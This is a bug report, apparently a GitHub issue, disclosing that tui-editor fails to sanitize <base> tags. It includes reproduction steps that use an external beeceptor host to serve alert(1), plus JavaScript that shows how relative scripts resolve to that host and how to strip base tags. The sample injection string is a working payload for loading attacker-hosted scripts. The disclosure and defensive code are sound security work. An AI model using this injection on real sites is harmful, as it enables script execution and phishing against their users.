Describe the bug
Base tags are not sanitized, which can lead to XSS.
To Reproduce
I'll use the ui.toast.com/tui-editor playground to demonstrate this vulnerability.
Steps to reproduce the behavior:
Create a server that returns the XSS payload (return alert(1) for every request). You can use avocadot0ast.free.beeceptor.com while it's available (it's a free server; too many requests and it will stop serving the payload).
Hover over the links (Weekly Picks, Release Notes, FE Guide etc)
See requests for some JSON files, but also for /component---src-pages-index-tsx-a5b41d7b681d62c9ee9a.js
See the alert(1)
Expected behavior
Base tags should be sanitized.
Additional context
I tested this with Chromium. The base tag overwrites the base URL; all relative links then point to that URL. I could exploit this for real XSS because there's a script dynamically loaded from a relative link when hovering over the links at the bottom of the page. Even when there are no relative scripts after the base tag, this will hijack some links and might lead to phishing or other undesired effects.
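The mechanism described in this report, as an added illustration that is not part of the original issue and is not tui-editor's own sanitizer: a small tag scanner that (a) computes the effective base URL the way a browser would, taking the first base element that carries an href, (b) shows where a relative script path would then be fetched from, and (c) drops base elements from the markup before it is rendered. The page URL, the attacker host and the relative script path are placeholders taken from the report; a production sanitizer should use a full HTML parser with an element allowlist rather than this scanner.

```javascript
// Assumed placeholder values taken from the report, not verified against the live site.
const PAGE_URL = 'https://ui.toast.com/tui-editor';
const RELATIVE_SCRIPT = '/component---src-pages-index-tsx-a5b41d7b681d62c9ee9a.js';

// Yield every start/end tag in the markup as {name, raw, start, end}.
// Quoted attribute values are respected, so `<base href="a>b">` is one tag,
// not two; that is the usual way naive "remove the tag" regexes get bypassed.
function* tags(html) {
  let i = 0;
  while ((i = html.indexOf('<', i)) !== -1) {
    const m = /^<\/?([a-zA-Z][^\s/>]*)/.exec(html.slice(i));
    if (!m) { i++; continue; }           // "<" that does not open a tag (e.g. "a < b", comments)
    let j = i + m[0].length;
    let quote = null;
    for (; j < html.length; j++) {
      const c = html[j];
      if (quote) { if (c === quote) quote = null; }
      else if (c === '"' || c === "'") quote = c;
      else if (c === '>') break;
    }
    const end = j < html.length ? j + 1 : html.length;
    yield { name: m[1].toLowerCase(), raw: html.slice(i, end), start: i, end };
    i = end;
  }
}

// Extract the href attribute (double-quoted, single-quoted or bare) from a raw tag.
function hrefOf(rawTag) {
  const m = /\shref\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i.exec(rawTag);
  return m ? (m[1] ?? m[2] ?? m[3]) : null;
}

// Browsers use the first <base> element that has an href, resolved against the page URL.
function effectiveBase(html, pageUrl) {
  for (const t of tags(html)) {
    if (t.name === 'base') {
      const href = hrefOf(t.raw);
      if (href !== null) return new URL(href, pageUrl).href;
    }
  }
  return new URL(pageUrl).href;
}

// Where a relative URL in the page would actually be fetched from after the markup is rendered.
function resolveRelative(html, pageUrl, relPath) {
  return new URL(relPath, effectiveBase(html, pageUrl)).href;
}

// Remove every <base ...> (and any stray </base>) from the markup, leaving other tags untouched.
function stripBaseTags(html) {
  let out = '';
  let last = 0;
  for (const t of tags(html)) {
    if (t.name === 'base') {
      out += html.slice(last, t.start);
      last = t.end;
    }
  }
  return out + html.slice(last);
}

// Constructed sample: a preview that contains an injected base tag pointing at an attacker host.
const INJECTED = '<base href="https://avocadot0ast.free.beeceptor.com/"><p>hello</p>';

console.log('unsanitized :', resolveRelative(INJECTED, PAGE_URL, RELATIVE_SCRIPT));
console.log('sanitized   :', resolveRelative(stripBaseTags(INJECTED), PAGE_URL, RELATIVE_SCRIPT));
```

Running it shows the relative script resolving to the attacker host before stripping and back to the page's own origin afterwards; the same resolution applies to relative anchors, which is the link-hijacking/phishing effect the report mentions.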